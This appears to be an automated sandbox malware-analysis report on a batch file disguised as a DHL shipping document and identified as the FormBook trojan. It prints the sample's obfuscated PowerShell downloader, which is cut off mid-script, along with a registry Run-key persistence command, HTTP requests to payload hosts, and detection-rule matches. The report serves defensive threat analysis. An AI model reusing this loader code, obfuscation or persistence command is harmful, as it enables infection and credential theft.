wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)", ProcessId: 3732, ProcessName: cmd.exe
            Sigma detected: Suspicious Powershell In Registry Run Keys
            Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scleroconjunctival
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot Gi

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://tejarat-gram.com/duWJGPYoYurORY170.binAvira URL Cloud: Label: phishing
            Source: https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.binAvira URL Cloud: Label: phishing
            Multi AV Scanner detection for submitted file
            Source: rDHL_PT563857935689275783656385FV-GDS3535353.batReversingLabs: Detection: 39%
            Yara detected FormBook
            Source: Yara matchFile source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: unknownHTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000005.00000002.2257014116.0000000006DE8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: Joe Sandbox ViewIP Address: 103.211.216.55 103.211.216.55
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /Samsende.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: econstramedia.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /duWJGPYoYurORY170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: tejarat-gram.comCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /Samsende.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: econstramedia.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /duWJGPYoYurORY170.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: tejarat-gram.comCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: econstramedia.com
            Source: global trafficDNS traffic detected: DNS query: tejarat-gram.com
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4C214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://econstramedia.com
            Source: powershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.c
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.co
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4BCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4A69D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/S
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Sa
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Sam
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Sams
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samse
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsen
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsend
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.j
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.jp
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4A69D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.jpb
            Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.jpbXR
            Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, 0000000A.00000002.2427597487.00000000243B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/duWJGPYoYurORY170.bin
            Source: wab.exe, 0000000A.00000002.2427597487.00000000243B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.bin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownHTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.4:49737 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_6988.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 6716, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6486
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6510
            Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6486Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6510Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_24A82DF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A835C0 NtCreateMutant,LdrInitializeThunk,10_2_24A835C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_24A82C70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82BA0 NtEnumerateValueKey,10_2_24A82BA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82CA0 NtQueryInformationToken,10_2_24A82CA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82EA0 NtAdjustPrivilegesToken,10_2_24A82EA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82FA0 NtQuerySection,10_2_24A82FA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82AB0 NtWaitForSingleObject,10_2_24A82AB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82DB0 NtEnumerateKey,10_2_24A82DB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82FB0 NtResumeThread,10_2_24A82FB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A839B0 NtGetContextThread,10_2_24A839B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82B80 NtQueryInformationFile,10_2_24A82B80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82E80 NtReadVirtualMemory,10_2_24A82E80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82F90 NtProtectVirtualMemory,10_2_24A82F90
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A83090 NtSetValueKey,10_2_24A83090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82BE0 NtQueryValueKey,10_2_24A82BE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82EE0 NtQueueApcThread,10_2_24A82EE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82FE0 NtCreateFile,10_2_24A82FE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82AF0 NtWriteFile,10_2_24A82AF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82BF0 NtAllocateVirtualMemory,10_2_24A82BF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82CF0 NtOpenProcess,10_2_24A82CF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82CC0 NtQueryVirtualMemory,10_2_24A82CC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82AD0 NtReadFile,10_2_24A82AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82DD0 NtDelayExecution,10_2_24A82DD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82D30 NtUnmapViewOfSection,10_2_24A82D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82E30 NtWriteVirtualMemory,10_2_24A82E30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82F30 NtCreateSection,10_2_24A82F30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82C00 NtQueryInformationProcess,10_2_24A82C00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82D00 NtSetInformationFile,10_2_24A82D00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82D10 NtMapViewOfSection,10_2_24A82D10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A83010 NtOpenDirectoryObject,10_2_24A83010
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A83D10 NtOpenProcessToken,10_2_24A83D10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82B60 NtClose,10_2_24A82B60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82C60 NtCreateKey,10_2_24A82C60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A82F60 NtCreateProcessEx,10_2_24A82F60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A83D70 NtOpenThread,10_2_24A83D70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A84340 NtSetContextThread,10_2_24A84340
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A84650 NtSuspendThread,10_2_24A84650
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_084AACD5 LdrInitializeThunk,Sleep,NtProtectVirtualMemory,10_2_084AACD5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B89BE922_2_00007FFD9B89BE92
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B89B0E62_2_00007FFD9B89B0E6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B9634642_2_00007FFD9B963464
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0425EF705_2_0425EF70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0425F8405_2_0425F840
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0425EC285_2_0425EC28
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A19B8010_2_24A19B80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A13FD210_2_24A13FD2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_24A13FD510_2_24A13FD5
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: amsi32_6988.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 6716, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.evad.winBAT@18/9@2/2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Nedprioriterende200.SigJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swyuor0u.rdj.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" "
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6716
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6988
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: rDHL_PT563857935689275783656385FV-GDS3535353.batReversingLabs: Detection: 39%
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP 